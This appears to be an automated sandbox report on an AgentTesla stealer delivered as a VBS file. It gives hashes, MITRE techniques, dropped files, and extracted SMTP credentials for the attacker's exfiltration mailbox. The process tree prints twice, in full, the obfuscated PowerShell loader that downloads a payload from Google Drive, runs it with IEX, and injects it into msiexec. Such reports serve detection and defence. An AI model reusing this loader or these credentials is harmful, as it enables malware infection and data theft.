agenttesla | be4b7116fa1243c9ad977381f3301854cca00273f968881bdf87c8e6777dca32

General

Target

r20240913TRANSFERENCIA.vbs
Size

96KB
MD5

6189a9d977994601ef954a1a146e8d8d
SHA1

93c638448ad65e7b005fa7c4527786e5462b05f2
SHA256

be4b7116fa1243c9ad977381f3301854cca00273f968881bdf87c8e6777dca32
SHA512

21d6b94be5fdb9e65b77e22de584cbad6ec3cd751f28dc478bee1d74c686538d5ef7038d8293d3d704547df871bead4cfe4a14ee52bac59124b685040b82326d
SSDEEP

3072:7LoqFwl872xHXYxo12gEzZPQxMQuh7q+UUdwnu3:Y0wq72NMokdzZaDuhe+UAl

Score

10^/10

agenttesla discovery execution keylogger spyware stealer trojan

Malware Config

Extracted

Family

agenttesla

Credentials

Protocol: smtp
Host:
smtp.yandex.com
Port:
587
Username:
[email protected]
Password:
marcellinus360
Email To:
[email protected]

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla

Blocklisted process makes network request 8 IoCs

flow	pid	Process
5	2832	powershell.exe
7	2832	powershell.exe
9	2488	msiexec.exe
11	2488	msiexec.exe
13	2488	msiexec.exe
15	2488	msiexec.exe
16	2488	msiexec.exe
18	2488	msiexec.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2832	powershell.exe
2596	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
4	drive.google.com
5	drive.google.com
9	drive.google.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
17	api.ipify.org
18	api.ipify.org

Network Service Discovery 1 TTPs 2 IoCs

Attempt to gather information on host's network.

discovery

Network Service Discovery

T1046

pid	Process
2832	powershell.exe
2596	powershell.exe

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

pid	Process
2488	msiexec.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
2596	powershell.exe
2488	msiexec.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe

Suspicious behavior: EnumeratesProcesses 5 IoCs

pid	Process
2832	powershell.exe
2596	powershell.exe
2596	powershell.exe
2488	msiexec.exe
2488	msiexec.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
2596	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	2832	powershell.exe
Token: SeDebugPrivilege	2596	powershell.exe
Token: SeDebugPrivilege	2488	msiexec.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
2488	msiexec.exe

Suspicious use of WriteProcessMemory 11 IoCs

description	pid	Process	procid_target
PID 2240 wrote to memory of 2832	2240	WScript.exe	28
PID 2240 wrote to memory of 2832	2240	WScript.exe	28
PID 2240 wrote to memory of 2832	2240	WScript.exe	28
PID 2596 wrote to memory of 2488	2596	powershell.exe	35
PID 2596 wrote to memory of 2488	2596	powershell.exe	35
PID 2596 wrote to memory of 2488	2596	powershell.exe	35
PID 2596 wrote to memory of 2488	2596	powershell.exe	35
PID 2596 wrote to memory of 2488	2596	powershell.exe	35
PID 2596 wrote to memory of 2488	2596	powershell.exe	35
PID 2596 wrote to memory of 2488	2596	powershell.exe	35
PID 2596 wrote to memory of 2488	2596	powershell.exe	35

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\r20240913TRANSFERENCIA.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:2240
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Bldningsforstyrrelser Bushwhacked Rkebiskoppers Johnsen Inkompetencers Urubu Brandsikkerheden #>;$Ottetals='bluett';<#Samkvemsrets Polydactylous Skemaden Vkstcentret Forsorgslederens #>;$Erstatningspligts40=$host.PrivateData;If ($Erstatningspligts40) {$Skallesmkkernes++;}function Virksomhedskategoris($Molossian){$Arbejdsdatabasen=$knsttelserne+$Molossian.Length-$Skallesmkkernes;for( $Nedsivningsbekendtgrelsers=4;$Nedsivningsbekendtgrelsers -lt $Arbejdsdatabasen;$Nedsivningsbekendtgrelsers+=5){$Shaftment='Refrygtigere';$Udlaanssal+=$Molossian[$Nedsivningsbekendtgrelsers];}$Udlaanssal;}function Crustaceology($Afdelingsingenirers){ & ($Ileitis) ($Afdelingsingenirers);}$Aarstalslisters=Virksomhedskategoris 'Rea.MRedaoRsonzVariiUddrlEddelBedaaTrip/ Des5Abso. Pi.0 Pie Knu(Bl,eW nciiFoalnSterdD meoT.mtw,ispsAl a SubiN.andTgald Fatu1Tud 0 Inu. Tr 0 Ser;data UnnoWSubsiharvnOtos6Doug4Folk;roko S,rexf,er6St.l4Mani;Pri SenrDermvBeha:Skav1Nuns2Libe1Trib.Co a0Fo k) S.i SejGI treBillcAudakFr.ioTyra/Ku s2Misk0Ops 1Ebra0 Ka 0Vari1Bar,0Biot1Taxa Ls nFWooli rbernor e GulfUdnyoRefexButi/U,ny1 Eft2Malc1 De .Pant0Besr ';$Hjlpemenuen=Virksomhedskategoris 'VibrUSignsCh tEPrieRN pt-F ypaFngsGA,ceERadinSamftSkre ';$Stolet111=Virksomhedskategoris 'La,ehPremtSchit Afkpsteds Sod: Ran/Ulid/Sv edD.sarP.eciBrudvSupeeMiso. scagTreeoSpiroA,sugBe klThoreFr.g. daac StaopaulmRavn/ VanuPrioc.pal? AfpeTegnxDodep StioMyrirgu rtRuna=Nos d ,taoPoppwMed nE enlJerno AndaP podSush&CrimiMaandPaga=Comp1Gamm0Spekm hoSWag dP esA Thr5Vill8 R ntG,grH ondF SupDPrio2MiljBv ndo amguHustrOzonBSpec_ Ce wFolkMAfskx ejlOvervBenzC Old-.lefLAfsvJ Jinj,oppwGa.orOutp4UlemRPiaz ';$Skovvogns134=Virksomhedskategoris 'E.ke>Razo ';$Ileitis=Virksomhedskategoris 'ProsiAbsceOut,X D s ';$Historicoreligious='Maffia';$Ornerily='\Nonpunctuating.sem';Crustaceology (Virksomhedskategoris 'unde$ Ti gSnkelOmsto ParbOli a TillAwig:.ranSGry,a HalnKnapd Brue erts L d= Und$TegneTropnTro,vG,ld:KunsaAst pAfmepSmaldExscahomotRistaMicr+Trom$NormO NatrKontnProaeArberRegei SullNonayKons ');Crustaceology (Virksomhedskategoris ' I,t$sinugSamalSkolo Befb Unsa Misl Int: ykvSOr gnudv.uSnadd gnoeBillsTri kHemoaMormf S,etPenneKrent NorsO.os= Ott$Di.iSCr,wtPalsoGrunlIncoeA,tetU de1Bilb1 ra1Trif.Sirss RappApprl Proir kot Nu (Mole$ChinS TrekStraoHo evAghovYngsoOvergP.ernAccrs Dia1Igno3R gr4Flum) ear ');Crustaceology (Virksomhedskategoris ' Con[ Tc NRadieS,avtArbi.PalaSUdsmeU rira kuvArsei AntcKomme AboPNoneo triTeran CaltJackMSnu a ,kan .oraGen.g syeNongr bli] irt:Ove :BefeS Ma.e FigcPolyu Dy rHypeiSpi.tFl wyDeklPisoarGrdeo PentCiteoMinic Frio InklStro Unra= Tyn Hydr[BradN Be eClust Ana.Do.aSCephe RedcbesvuTer rRomaiSig t EntySkumPDis r EntoPrestUdbuoHelicRetvoM.ndlD,unTKondyT rep OuteSka ]Date:Sync:KretTMasslPo ys G.a1Appe2Flyg ');$Stolet111=$Snudeskaftets[0];$Gennemboring=(Virksomhedskategoris ' Div$ MllgFarfLaflyO K iBFurbaForsLPer :Bestc PerU .roBKessbSvalityktEPavls eh=circnEme,eBenvwPro -AskoO inbF rnJV nbEHo ecRealtChec UngSS umyLnu sRe.rtHarpe dypM Lic.DiddnOmbueS mmtre i.Che W ewETil BUndeC AnbLVaryiL.ureResenAcrotSkat ');Crustaceology ($Gennemboring);Crustaceology (Virksomhedskategoris 'dus $AnodCVersuSulpb PribF,rmiTurneNedasFred.ConsHlgeueTotaaDepodGutsetmmerDamns.upe[Ansv$BehnHJur.jSperlSkifpoutseManimPsykeK ytnMic uGa,geVildnCrim]stjn=Krlh$ NimATorta PrerL,ndsMulttSporaForsl alusRiorlAfriiSompsTilftLaseeAktirSi esM lo ');$Sampson=Virksomhedskategoris ' In,$TermCSka.uBoi.bSatybPrepiAfmaeSal.sOver. ,enD.riloJ bswBugmn H rlNondoSch a Sl.d odFPhosiB nkla umeVold( ong$BranSDa,atNoumo A tlVenteSalut ,ls1.hyt1 pec1Visk,Efte$MaskPFiskoFllel edyDec,sCambo SlirStavbHercaVestt IneeTykm) an ';$Polysorbate=$Sandes;Crustaceology (Virksomhedskategoris 'ta a$ ubtguforlMa iOL.gabD sca KunlDv,g: FrenPl,yUileuMAngeM BevUCod.SChat1Fo.n2Hold9Peri= Gen(GuraTchr eTillST.ckTSoot-L vrPCutwaPlonTKreahVels oci$Op,rPFaa,oKontLNic.YTyresP jlOTyporWheaBadiaaLi htNo je isc)G er ');while (!$Nummus129) {Crustaceology (Virksomhedskategoris 'Diop$FrasgFedtl.rono Repb kkvaSnaglDkni: rosP Of hProxoRes t.kjooTaurmUsdeaDigngfrihn F,deUn mtPseui r bsLocam.yri= ,us$LinutTr,urSaunudisweOver ') ;Crustaceology $Sampson;Crustaceology (Virksomhedskategoris 'Til S UnitLa paObelr A ttPeri- a tS ,jolLrdaeA beeVek pMor. Pent4 E.s ');Crustaceology (Virksomhedskategoris 're n$BebugH aslLibeoAbdobMuraa Pe,lC ru:G nsNTikkuBacim ensm StauMarks E i1fik.2P.ae9Elde= Fri(Ho fTAlleesy tsBidst ges-HagePNihiaUpbbtGagghAm u Seck$Ant.PToppoSotilBefoyUndis entoResprTimebMayoaTopit BeteToba) one ') ;Crustaceology (Virksomhedskategoris ' stn$Sgesg,nfalPersoC,osbDrosaFlitlejen:LuftSModelEfteoKarlw RanfCharoMis.x ,rde Re r yvt=Po,t$Di,hgMedelBabyoOph b NefaDilllForb: D,nfvagroRottlCan k aaePlurkOverr mog+ be.+Opse% She$ MunSDislnBecuuBonedGuldeTa esSparkC.opaF,brfTim tCloceEgoitVe,msCirc.Hy,ocArcaoAdmiuAdlin BaltIman ') ;$Stolet111=$Snudeskaftets[$Slowfoxer];}$Relinquishers=275628;$Henvejres=30508;Crustaceology (Virksomhedskategoris 'Q,in$ Jo gTranlPl.toHetebAfsbaD cil B n:Fiskd LitePrelmSystiAfgitSegmrCoo aProliGenenDybd Tsi=Regr wagG Pree Burt E a-TranCEmbro.unenLagrt.ewseRatanPeckt ac Tops$CullPMe lo H plOzony .ntsD stoDe orMejsbRe.saE tetBlode eco ');Crustaceology (Virksomhedskategoris 'Bort$PatrgCordlMunioFedebVsenaThorlStil:UndsT Pl,rMerpiPurtcTe.ru SyvsKulmpKal i Uigd BehaCh ntVan,eLo s D av= Kam Ac.e[Hed.S ariyOmnosMa,otPaase TemmSmun.SnylCryg.oEubtnBallvGavleM.lercasst Ska]Hnde:Chee: SkuFT lsrKommoE lamTilrB,ladaObsescente ing6 Bjr4 alpSForst,ptrr aneiUnd.nMadogMoms(Unso$Torkd oddeHrelmBladi tiktDiapr laga VeriForhnnow )B au ');Crustaceology (Virksomhedskategoris ' ol$ BesgScrelB rgoThrobStudast alForn:YppeKRi eoundevNat e E.snLa.adFor.i isknS.ragIn fe Andn ravsAn,r Dann=Seni Adst[telmS MasyUdstsD ritShyfeDioimlun,.F reTChefeDirexRoust Ma,.chamEPasqnNyspcOxteo R wdCit iorannRe,egpass]Inds: er:DecoAFlekSGam CD oeIBuckIfler.G liGPlaseg,ootpe iSSluptArisrFormiForunRe ngArme(Arki$ venT ortrTailiTilsc,taguE.orsAggrpInfeiBarkdGiftaAzimtLaste Tus)Elec ');Crustaceology (Virksomhedskategoris 'T kk$WullgO.erlArgyoH ptbA tiaWan.lTurn:AminMKat itheosWaigoSurtmSamlaOpertEmbrhpard1Bevi9D st0 Ant=Oran$T ecK PepoAbb vForbeMos nF,dedWardiekspnGullgAnt e orn cobs,eel.Trics nciuCannb EsosbusttpickrUds.i obln .ergCirk( Con$ErytRFamieBemelOv ri.espnF rsq lviu Preiincrs Co.h SmrefritrBailsT gn, ss$teatHpolleTrannLysev.ible UnwjMentr ForeCei,sSphe)smul ');Crustaceology $Misomath190;"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Network Service Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2832

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Bldningsforstyrrelser Bushwhacked Rkebiskoppers Johnsen Inkompetencers Urubu Brandsikkerheden #>;$Ottetals='bluett';<#Samkvemsrets Polydactylous Skemaden Vkstcentret Forsorgslederens #>;$Erstatningspligts40=$host.PrivateData;If ($Erstatningspligts40) {$Skallesmkkernes++;}function Virksomhedskategoris($Molossian){$Arbejdsdatabasen=$knsttelserne+$Molossian.Length-$Skallesmkkernes;for( $Nedsivningsbekendtgrelsers=4;$Nedsivningsbekendtgrelsers -lt $Arbejdsdatabasen;$Nedsivningsbekendtgrelsers+=5){$Shaftment='Refrygtigere';$Udlaanssal+=$Molossian[$Nedsivningsbekendtgrelsers];}$Udlaanssal;}function Crustaceology($Afdelingsingenirers){ & ($Ileitis) ($Afdelingsingenirers);}$Aarstalslisters=Virksomhedskategoris 'Rea.MRedaoRsonzVariiUddrlEddelBedaaTrip/ Des5Abso. Pi.0 Pie Knu(Bl,eW nciiFoalnSterdD meoT.mtw,ispsAl a SubiN.andTgald Fatu1Tud 0 Inu. Tr 0 Ser;data UnnoWSubsiharvnOtos6Doug4Folk;roko S,rexf,er6St.l4Mani;Pri SenrDermvBeha:Skav1Nuns2Libe1Trib.Co a0Fo k) S.i SejGI treBillcAudakFr.ioTyra/Ku s2Misk0Ops 1Ebra0 Ka 0Vari1Bar,0Biot1Taxa Ls nFWooli rbernor e GulfUdnyoRefexButi/U,ny1 Eft2Malc1 De .Pant0Besr ';$Hjlpemenuen=Virksomhedskategoris 'VibrUSignsCh tEPrieRN pt-F ypaFngsGA,ceERadinSamftSkre ';$Stolet111=Virksomhedskategoris 'La,ehPremtSchit Afkpsteds Sod: Ran/Ulid/Sv edD.sarP.eciBrudvSupeeMiso. scagTreeoSpiroA,sugBe klThoreFr.g. daac StaopaulmRavn/ VanuPrioc.pal? AfpeTegnxDodep StioMyrirgu rtRuna=Nos d ,taoPoppwMed nE enlJerno AndaP podSush&CrimiMaandPaga=Comp1Gamm0Spekm hoSWag dP esA Thr5Vill8 R ntG,grH ondF SupDPrio2MiljBv ndo amguHustrOzonBSpec_ Ce wFolkMAfskx ejlOvervBenzC Old-.lefLAfsvJ Jinj,oppwGa.orOutp4UlemRPiaz ';$Skovvogns134=Virksomhedskategoris 'E.ke>Razo ';$Ileitis=Virksomhedskategoris 'ProsiAbsceOut,X D s ';$Historicoreligious='Maffia';$Ornerily='\Nonpunctuating.sem';Crustaceology (Virksomhedskategoris 'unde$ Ti gSnkelOmsto ParbOli a TillAwig:.ranSGry,a HalnKnapd Brue erts L d= Und$TegneTropnTro,vG,ld:KunsaAst pAfmepSmaldExscahomotRistaMicr+Trom$NormO NatrKontnProaeArberRegei SullNonayKons ');Crustaceology (Virksomhedskategoris ' I,t$sinugSamalSkolo Befb Unsa Misl Int: ykvSOr gnudv.uSnadd gnoeBillsTri kHemoaMormf S,etPenneKrent NorsO.os= Ott$Di.iSCr,wtPalsoGrunlIncoeA,tetU de1Bilb1 ra1Trif.Sirss RappApprl Proir kot Nu (Mole$ChinS TrekStraoHo evAghovYngsoOvergP.ernAccrs Dia1Igno3R gr4Flum) ear ');Crustaceology (Virksomhedskategoris ' Con[ Tc NRadieS,avtArbi.PalaSUdsmeU rira kuvArsei AntcKomme AboPNoneo triTeran CaltJackMSnu a ,kan .oraGen.g syeNongr bli] irt:Ove :BefeS Ma.e FigcPolyu Dy rHypeiSpi.tFl wyDeklPisoarGrdeo PentCiteoMinic Frio InklStro Unra= Tyn Hydr[BradN Be eClust Ana.Do.aSCephe RedcbesvuTer rRomaiSig t EntySkumPDis r EntoPrestUdbuoHelicRetvoM.ndlD,unTKondyT rep OuteSka ]Date:Sync:KretTMasslPo ys G.a1Appe2Flyg ');$Stolet111=$Snudeskaftets[0];$Gennemboring=(Virksomhedskategoris ' Div$ MllgFarfLaflyO K iBFurbaForsLPer :Bestc PerU .roBKessbSvalityktEPavls eh=circnEme,eBenvwPro -AskoO inbF rnJV nbEHo ecRealtChec UngSS umyLnu sRe.rtHarpe dypM Lic.DiddnOmbueS mmtre i.Che W ewETil BUndeC AnbLVaryiL.ureResenAcrotSkat ');Crustaceology ($Gennemboring);Crustaceology (Virksomhedskategoris 'dus $AnodCVersuSulpb PribF,rmiTurneNedasFred.ConsHlgeueTotaaDepodGutsetmmerDamns.upe[Ansv$BehnHJur.jSperlSkifpoutseManimPsykeK ytnMic uGa,geVildnCrim]stjn=Krlh$ NimATorta PrerL,ndsMulttSporaForsl alusRiorlAfriiSompsTilftLaseeAktirSi esM lo ');$Sampson=Virksomhedskategoris ' In,$TermCSka.uBoi.bSatybPrepiAfmaeSal.sOver. ,enD.riloJ bswBugmn H rlNondoSch a Sl.d odFPhosiB nkla umeVold( ong$BranSDa,atNoumo A tlVenteSalut ,ls1.hyt1 pec1Visk,Efte$MaskPFiskoFllel edyDec,sCambo SlirStavbHercaVestt IneeTykm) an ';$Polysorbate=$Sandes;Crustaceology (Virksomhedskategoris 'ta a$ ubtguforlMa iOL.gabD sca KunlDv,g: FrenPl,yUileuMAngeM BevUCod.SChat1Fo.n2Hold9Peri= Gen(GuraTchr eTillST.ckTSoot-L vrPCutwaPlonTKreahVels oci$Op,rPFaa,oKontLNic.YTyresP jlOTyporWheaBadiaaLi htNo je isc)G er ');while (!$Nummus129) {Crustaceology (Virksomhedskategoris 'Diop$FrasgFedtl.rono Repb kkvaSnaglDkni: rosP Of hProxoRes t.kjooTaurmUsdeaDigngfrihn F,deUn mtPseui r bsLocam.yri= ,us$LinutTr,urSaunudisweOver ') ;Crustaceology $Sampson;Crustaceology (Virksomhedskategoris 'Til S UnitLa paObelr A ttPeri- a tS ,jolLrdaeA beeVek pMor. Pent4 E.s ');Crustaceology (Virksomhedskategoris 're n$BebugH aslLibeoAbdobMuraa Pe,lC ru:G nsNTikkuBacim ensm StauMarks E i1fik.2P.ae9Elde= Fri(Ho fTAlleesy tsBidst ges-HagePNihiaUpbbtGagghAm u Seck$Ant.PToppoSotilBefoyUndis entoResprTimebMayoaTopit BeteToba) one ') ;Crustaceology (Virksomhedskategoris ' stn$Sgesg,nfalPersoC,osbDrosaFlitlejen:LuftSModelEfteoKarlw RanfCharoMis.x ,rde Re r yvt=Po,t$Di,hgMedelBabyoOph b NefaDilllForb: D,nfvagroRottlCan k aaePlurkOverr mog+ be.+Opse% She$ MunSDislnBecuuBonedGuldeTa esSparkC.opaF,brfTim tCloceEgoitVe,msCirc.Hy,ocArcaoAdmiuAdlin BaltIman ') ;$Stolet111=$Snudeskaftets[$Slowfoxer];}$Relinquishers=275628;$Henvejres=30508;Crustaceology (Virksomhedskategoris 'Q,in$ Jo gTranlPl.toHetebAfsbaD cil B n:Fiskd LitePrelmSystiAfgitSegmrCoo aProliGenenDybd Tsi=Regr wagG Pree Burt E a-TranCEmbro.unenLagrt.ewseRatanPeckt ac Tops$CullPMe lo H plOzony .ntsD stoDe orMejsbRe.saE tetBlode eco ');Crustaceology (Virksomhedskategoris 'Bort$PatrgCordlMunioFedebVsenaThorlStil:UndsT Pl,rMerpiPurtcTe.ru SyvsKulmpKal i Uigd BehaCh ntVan,eLo s D av= Kam Ac.e[Hed.S ariyOmnosMa,otPaase TemmSmun.SnylCryg.oEubtnBallvGavleM.lercasst Ska]Hnde:Chee: SkuFT lsrKommoE lamTilrB,ladaObsescente ing6 Bjr4 alpSForst,ptrr aneiUnd.nMadogMoms(Unso$Torkd oddeHrelmBladi tiktDiapr laga VeriForhnnow )B au ');Crustaceology (Virksomhedskategoris ' ol$ BesgScrelB rgoThrobStudast alForn:YppeKRi eoundevNat e E.snLa.adFor.i isknS.ragIn fe Andn ravsAn,r Dann=Seni Adst[telmS MasyUdstsD ritShyfeDioimlun,.F reTChefeDirexRoust Ma,.chamEPasqnNyspcOxteo R wdCit iorannRe,egpass]Inds: er:DecoAFlekSGam CD oeIBuckIfler.G liGPlaseg,ootpe iSSluptArisrFormiForunRe ngArme(Arki$ venT ortrTailiTilsc,taguE.orsAggrpInfeiBarkdGiftaAzimtLaste Tus)Elec ');Crustaceology (Virksomhedskategoris 'T kk$WullgO.erlArgyoH ptbA tiaWan.lTurn:AminMKat itheosWaigoSurtmSamlaOpertEmbrhpard1Bevi9D st0 Ant=Oran$T ecK PepoAbb vForbeMos nF,dedWardiekspnGullgAnt e orn cobs,eel.Trics nciuCannb EsosbusttpickrUds.i obln .ergCirk( Con$ErytRFamieBemelOv ri.espnF rsq lviu Preiincrs Co.h SmrefritrBailsT gn, ss$teatHpolleTrannLysev.ible UnwjMentr ForeCei,sSphe)smul ');Crustaceology $Misomath190;"
1⤵
- Command and Scripting Interpreter: PowerShell
- Network Service Discovery
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2596
- C:\Windows\syswow64\msiexec.exe
  "C:\Windows\syswow64\msiexec.exe"
  2⤵
  - Blocklisted process makes network request
  - Suspicious use of NtCreateThreadExHideFromDebugger
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  PID:2488

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Network Service Discovery

1

T1046

System Information Discovery

1

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\MCTO4LGH827Y6I66LRJG.temp

Filesize
7KB

MD5
5d71de22bcc2394bf017432151684ad4

SHA1
61046c20c5292110c9d68ab8fdf22f4236a5ad7e

SHA256
ad12f0fa2fe70198d82a69293f20fda736d25e0a7a0939a88a304228e004efc3

SHA512
d9b534c012da879f63e2ee6e4cd7d2f9eb6ad147fc333dec46261554231d4956271a65a571b31a10b7e7be84321a888dbcfb64ba6f260aba9d94aa11b9f344a8

Download Submit
C:\Users\Admin\AppData\Roaming\Nonpunctuating.sem

Filesize
398KB

MD5
16c143ca49e7146c80dc68bbf23ae6e1

SHA1
e62e4cebad7844465b3b91a26b00e2a3ad3adc05

SHA256
a4d0b0620550854cfd0c2f78ad64372fe54c28268402e0c1c195efc9df2c8630

SHA512
c1080c102e5cacceb7e57548fe0cb9f8e121076c42a22c8ee022ca2672607d08f29bf2aa684cbba1763badfdd940955d3b47aad20ffa7b260e6f3b2473783264

Download Submit
memory/2488-40-0x0000000000F10000-0x0000000000F50000-memory.dmp

Filesize
256KB

Download
memory/2488-39-0x0000000000F10000-0x0000000001F72000-memory.dmp

Filesize
16.4MB

Download
memory/2488-38-0x0000000000F10000-0x0000000001F72000-memory.dmp

Filesize
16.4MB

Download
memory/2596-18-0x0000000006780000-0x0000000008760000-memory.dmp

Filesize
31.9MB

Download
memory/2832-7-0x000007FEF62C0000-0x000007FEF6C5D000-memory.dmp

Filesize
9.6MB

Download
memory/2832-12-0x000007FEF657E000-0x000007FEF657F000-memory.dmp

Filesize
4KB

Download
memory/2832-14-0x000007FEF62C0000-0x000007FEF6C5D000-memory.dmp

Filesize
9.6MB

Download
memory/2832-11-0x000007FEF62C0000-0x000007FEF6C5D000-memory.dmp

Filesize
9.6MB

Download
memory/2832-9-0x000007FEF62C0000-0x000007FEF6C5D000-memory.dmp

Filesize
9.6MB

Download
memory/2832-8-0x000007FEF62C0000-0x000007FEF6C5D000-memory.dmp

Filesize
9.6MB

Download
memory/2832-4-0x000007FEF657E000-0x000007FEF657F000-memory.dmp

Filesize
4KB

Download
memory/2832-6-0x0000000001F00000-0x0000000001F08000-memory.dmp

Filesize
32KB

Download
memory/2832-5-0x000000001B5B0000-0x000000001B892000-memory.dmp

Filesize
2.9MB

Download

Analysis

Sharing